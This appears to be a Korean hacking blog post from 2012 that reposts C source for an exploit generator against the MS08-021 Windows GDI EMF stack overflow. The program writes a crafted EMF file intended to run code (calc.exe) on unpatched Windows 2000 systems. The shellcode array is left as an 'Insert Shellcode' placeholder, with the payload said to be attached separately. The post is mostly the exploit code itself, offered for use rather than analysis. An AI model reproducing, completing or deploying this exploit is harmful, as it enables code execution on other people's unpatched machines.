MS Windows GDI Image Parsing Stack Overflow Exploit

2012. 2. 5. 19:20개발/해킹

4월 14일 공개된 MS GDI Image Parsing 관련 Exploit Code.

 

Shellcode 는 넘 커서 파일첨부로 따로 ;;

 

MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)

 

/////////////////////////////////////////////////////////////
///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
///          automatically run calc.exe in Win2kSP4 CHS Version
///    with MS07-046 patched but no MS08-021 is installed.
///    In Windows XP SP2, explorer.exe will crashed but
///          calc will not be run.
/////////////////////////////////////////////////////////////

#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
unsigned char data[130168] = {


Insert Shellcode

 

};
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
int _tmain(int argc, _TCHAR* argv[])
{
 printf("/////////////////////////////////////////////////////////////\n\
///Exploit the MS08-021 : Stack Overflow on GDI API\n\
///Author: Lamhtz\n\
///Date: April 14th, 2008\n\
///Usage: <appname.exe> [filename]\n\
///Your filename must end with .emf\n\
/////////////////////////////////////////////////////////\n");
 if (argc != 2)
 {
  
  printf("Usage: <appname.exe> [filename]\n");
  exit(0);
 }
 FILE *stream;
  

   if( fopen_s( &stream, argv[1], "w+b" ) == 0 )
   {
      printf("Generating %s....\n", argv[1]);
   fwrite( data, sizeof(data) ,1 , stream );
      printf( "%s created ! \n", argv[1] );
      fclose( stream );

   }
   else
   {
    printf("File Created Failure ! \n");
    exit(-1);
   }
 return 0;
}

'개발 > 해킹' 카테고리의 다른 글

Apache Killer" a DDoS using the Range HTTP Header  (0) 2012.02.05
JSUNPACK  (0) 2012.02.05
XSS 공격 및 방어 가이드  (6) 2012.02.05
ARP Spoofing 기법을 이용한 악성코드  (0) 2012.02.05
DNS 싱크홀 적용 안내서  (0) 2012.02.05